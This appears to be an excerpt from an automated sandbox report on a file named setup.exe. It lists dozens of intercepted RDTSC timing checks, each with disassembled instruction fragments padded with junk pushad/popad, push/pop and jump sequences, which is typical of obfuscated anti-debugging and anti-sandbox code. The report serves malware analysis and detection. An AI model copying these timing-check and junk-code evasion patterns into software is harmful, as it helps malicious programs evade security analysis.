Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90E40 second address: 4D90E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD6572h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90E56 second address: 4D90E8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FF32CFB7207h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF32CFB7205h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D700C3 second address: 4D700C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D700C9 second address: 4D700CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D700CD second address: 4D70135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6573h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FF32CDD6576h 0x00000012 push dword ptr [ebp+04h] 0x00000015 jmp 00007FF32CDD6570h 0x0000001a push dword ptr [ebp+0Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007FF32CDD656Dh 0x00000025 jmp 00007FF32CDD6570h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70182 second address: 4D701A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF32CFB7207h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D701A8 second address: 4D701C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90C24 second address: 4D90C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 pushad 0x00000007 movzx ecx, dx 0x0000000a mov edi, 786A2838h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push edx 0x00000013 push eax 0x00000014 pop ebx 0x00000015 pop esi 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FF32CFB7201h 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 mov ebx, 470ECAAEh 0x00000025 popad 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FF32CFB7200h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90C69 second address: 4D90C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90C6F second address: 4D90C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90C73 second address: 4D90C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D907D4 second address: 4D9084B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CFB7200h 0x00000008 sbb cx, A018h 0x0000000d jmp 00007FF32CFB71FBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov edi, eax 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 jmp 00007FF32CFB7202h 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 jmp 00007FF32CFB71FEh 0x00000026 pushfd 0x00000027 jmp 00007FF32CFB7202h 0x0000002c adc ch, FFFFFFD8h 0x0000002f jmp 00007FF32CFB71FBh 0x00000034 popfd 0x00000035 popad 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushad 0x0000003b popad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D9084B second address: 4D90853 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA01E8 second address: 4DA01ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA01ED second address: 4DA0206 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD6575h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0206 second address: 4DA0296 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FF32CFB71FEh 0x00000011 push eax 0x00000012 pushad 0x00000013 call 00007FF32CFB7201h 0x00000018 mov edx, ecx 0x0000001a pop esi 0x0000001b pushad 0x0000001c mov ax, dx 0x0000001f popad 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 jmp 00007FF32CFB71FEh 0x00000028 pushfd 0x00000029 jmp 00007FF32CFB7202h 0x0000002e sub si, 99A8h 0x00000033 jmp 00007FF32CFB71FBh 0x00000038 popfd 0x00000039 popad 0x0000003a mov ebp, esp 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FF32CFB7205h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0296 second address: 4DA02B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, ax 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA02B3 second address: 4DA02B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA02B9 second address: 4DA02BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DE001B second address: 4DE0021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DE0021 second address: 4DE0025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DE0025 second address: 4DE0029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DE0029 second address: 4DE0087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF32CDD6579h 0x00000012 sbb al, 00000036h 0x00000015 jmp 00007FF32CDD6571h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007FF32CDD6570h 0x00000021 xor ax, B758h 0x00000026 jmp 00007FF32CDD656Bh 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DE0087 second address: 4DE008D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DE008D second address: 4DE00F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF32CDD6573h 0x00000013 add ax, B2CEh 0x00000018 jmp 00007FF32CDD6579h 0x0000001d popfd 0x0000001e push ecx 0x0000001f pop edi 0x00000020 popad 0x00000021 mov dx, si 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 jmp 00007FF32CDD6576h 0x0000002c pop ebp 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 mov esi, 2371CB53h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB0425 second address: 4DB0460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 movsx ebx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FF32CFB7202h 0x00000012 mov eax, dword ptr [ebp+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF32CFB7207h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB0460 second address: 4DB04DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c pushad 0x0000000d mov ax, A163h 0x00000011 push eax 0x00000012 pushfd 0x00000013 jmp 00007FF32CDD656Fh 0x00000018 xor ax, D38Eh 0x0000001d jmp 00007FF32CDD6579h 0x00000022 popfd 0x00000023 pop eax 0x00000024 popad 0x00000025 and dword ptr [eax+04h], 00000000h 0x00000029 jmp 00007FF32CDD6577h 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov bh, 56h 0x00000034 mov si, 6113h 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90642 second address: 4D90651 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90651 second address: 4D90657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90657 second address: 4D9065B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0E91 second address: 4DA0E97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0E97 second address: 4DA0E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB02A1 second address: 4DB02A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0777 second address: 4DD077B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD077B second address: 4DD078E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD656Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD078E second address: 4DD0794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0794 second address: 4DD0798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0798 second address: 4DD07CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov ebx, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007FF32CFB7204h 0x00000014 sbb cl, 00000068h 0x00000017 jmp 00007FF32CFB71FBh 0x0000001c popfd 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD07CA second address: 4DD0800 instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FF32CDD6572h 0x00000010 mov ebp, esp 0x00000012 jmp 00007FF32CDD6570h 0x00000017 xchg eax, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0800 second address: 4DD0804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0804 second address: 4DD0808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0808 second address: 4DD080E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD080E second address: 4DD0870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 74h 0x00000005 pushfd 0x00000006 jmp 00007FF32CDD6577h 0x0000000b or ecx, 12DC386Eh 0x00000011 jmp 00007FF32CDD6579h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007FF32CDD6571h 0x00000020 xchg eax, ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FF32CDD656Dh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0870 second address: 4DD0893 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [774365FCh] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov eax, edi 0x00000013 mov si, di 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0893 second address: 4DD08F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6570h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c push esi 0x0000000d mov dl, 54h 0x0000000f pop ecx 0x00000010 pushfd 0x00000011 jmp 00007FF32CDD656Fh 0x00000016 xor ch, FFFFFFEEh 0x00000019 jmp 00007FF32CDD6579h 0x0000001e popfd 0x0000001f popad 0x00000020 je 00007FF39F3B95F0h 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FF32CDD656Dh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD08F1 second address: 4DD0919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dh 0x00000005 mov bx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, eax 0x0000000d jmp 00007FF32CFB7202h 0x00000012 xor eax, dword ptr [ebp+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0919 second address: 4DD091D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD091D second address: 4DD0937 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7206h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0937 second address: 4DD0967 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD656Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c jmp 00007FF32CDD6576h 0x00000011 ror eax, cl 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0967 second address: 4DD096B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD096B second address: 4DD0971 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0971 second address: 4DD09D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, al 0x00000005 mov edi, 55AB2E82h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d leave 0x0000000e jmp 00007FF32CFB7209h 0x00000013 retn 0004h 0x00000016 nop 0x00000017 mov esi, eax 0x00000019 lea eax, dword ptr [ebp-08h] 0x0000001c xor esi, dword ptr [00C82014h] 0x00000022 push eax 0x00000023 push eax 0x00000024 push eax 0x00000025 lea eax, dword ptr [ebp-10h] 0x00000028 push eax 0x00000029 call 00007FF331147BA1h 0x0000002e push FFFFFFFEh 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007FF32CFB7203h 0x00000039 add ch, FFFFFFDEh 0x0000003c jmp 00007FF32CFB7209h 0x00000041 popfd 0x00000042 mov eax, 47CE25A7h 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD09D7 second address: 4DD0A06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov ecx, 477649BBh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 mov al, 35h 0x00000012 popad 0x00000013 ret 0x00000014 nop 0x00000015 push eax 0x00000016 call 00007FF330F66F5Ah 0x0000001b mov edi, edi 0x0000001d jmp 00007FF32CDD6572h 0x00000022 xchg eax, ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0A06 second address: 4DD0A23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0A23 second address: 4DD0A63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007FF32CDD6577h 0x00000010 mov bx, si 0x00000013 pop esi 0x00000014 movsx ebx, ax 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov cx, di 0x0000001f mov bl, D8h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DD0A63 second address: 4DD0AB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7207h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ecx, 5785811Bh 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FF32CFB71FEh 0x00000018 xor si, E9E8h 0x0000001d jmp 00007FF32CFB71FBh 0x00000022 popfd 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov edi, 735172C4h 0x00000030 push ebx 0x00000031 pop ecx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80051 second address: 4D800C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD656Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop edi 0x00000010 pushfd 0x00000011 jmp 00007FF32CDD6578h 0x00000016 sub cl, FFFFFF98h 0x00000019 jmp 00007FF32CDD656Bh 0x0000001e popfd 0x0000001f popad 0x00000020 popad 0x00000021 push esi 0x00000022 pushad 0x00000023 jmp 00007FF32CDD6570h 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FF32CDD6570h 0x0000002f add cx, 4228h 0x00000034 jmp 00007FF32CDD656Bh 0x00000039 popfd 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D800C9 second address: 4D8010B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b movzx eax, bx 0x0000000e mov cl, bl 0x00000010 popad 0x00000011 pushfd 0x00000012 jmp 00007FF32CFB7206h 0x00000017 sbb ch, FFFFFFB8h 0x0000001a jmp 00007FF32CFB71FBh 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 movsx ebx, ax 0x00000028 push eax 0x00000029 pop edi 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8010B second address: 4D80111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80111 second address: 4D80131 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF32CFB71FEh 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov ecx, 03CFC963h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80131 second address: 4D8017D instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushfd 0x00000009 jmp 00007FF32CDD656Bh 0x0000000e and si, 1B8Eh 0x00000013 jmp 00007FF32CDD6579h 0x00000018 popfd 0x00000019 popad 0x0000001a popad 0x0000001b mov ebx, dword ptr [ebp+10h] 0x0000001e jmp 00007FF32CDD656Dh 0x00000023 xchg eax, esi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8017D second address: 4D80181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80181 second address: 4D80185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80185 second address: 4D8018B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8018B second address: 4D80206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6572h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF32CDD656Bh 0x0000000f xchg eax, esi 0x00000010 jmp 00007FF32CDD6576h 0x00000015 mov esi, dword ptr [ebp+08h] 0x00000018 pushad 0x00000019 mov dl, al 0x0000001b jmp 00007FF32CDD6573h 0x00000020 popad 0x00000021 xchg eax, edi 0x00000022 jmp 00007FF32CDD6576h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FF32CDD656Eh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80206 second address: 4D80239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 push edi 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, edi 0x0000000b jmp 00007FF32CFB71FFh 0x00000010 test esi, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF32CFB7205h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80239 second address: 4D8023F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8023F second address: 4D80253 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FF39F5E55C4h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80253 second address: 4D80257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80257 second address: 4D8025B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8025B second address: 4D80261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80261 second address: 4D802DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7203h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 mov ebx, esi 0x00000013 push ecx 0x00000014 mov ax, bx 0x00000017 pop edx 0x00000018 popad 0x00000019 je 00007FF39F5E5599h 0x0000001f jmp 00007FF32CFB7206h 0x00000024 mov edx, dword ptr [esi+44h] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a jmp 00007FF32CFB71FDh 0x0000002f pushfd 0x00000030 jmp 00007FF32CFB7200h 0x00000035 or eax, 1C579368h 0x0000003b jmp 00007FF32CFB71FBh 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
